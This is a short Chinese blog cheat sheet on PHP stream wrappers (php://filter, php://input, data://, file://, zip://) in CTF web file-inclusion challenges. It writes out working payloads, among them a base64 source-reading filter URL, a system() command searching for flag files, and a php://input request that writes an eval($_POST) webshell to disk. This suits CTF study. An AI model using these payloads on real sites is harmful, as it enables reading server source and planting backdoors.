CTF比赛中Web的php伪协议类型题小结

php协议类型

file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档

1.php伪协议:

需要开启allow_url_fopen的: php://input、php://stdin、php://memory和php://temp 不需要开启allow_wrl_fopen的: php://filter

在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码 php://input用于执行php代码 php://input需要post请求提交数据 php://filter可以get提交?a=php://filter/read=convert.base64-encode/resource=xxx.php
convert.*过滤器 支持convert.iconv.* 格式,使用方法: convert.iconv.<input-encoding>.<output-encoding> convert.iconv.<input-encoding>/<output-encoding> 例如: convert.iconv.UCS-4*.UCS-4BE ---> 将指定的文件从UCS-4*转换为UCS-4BE 输出 ?filename=php://filter/convert.iconv.a.b/resource=check.php (a,b 位置是编码格式)

2.data协议

php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

data伪协议只有在php<5.3且include=on时可以写木马。

3.file协议

file://用于访问本地文件系统

用法: file://[文件的绝对路径和文件名]

#<?php system('find / -name flag*'); ?>

4.zip协议

封装伪协议命令如下:

?cmd=zip://D:\phpstudy\WWW\txt.zip%23zip.txt

前面是zip文件 后面是zip中的文件

5.input写马

GET /include.php?cmd=php://input HTTP/1.1 (数据包头部)
请求体中增加一句马

<?php fwrite(fopen('exp.php','w'),'<?php eval($_POST[shell]);?>');?>

__EOF__

本文作者Tzyyyyy
本文链接https://www.cnblogs.com/Tzyyyyy/p/17584802.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   Tzyyyyy  阅读(416)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
点击右上角即可分享
微信分享提示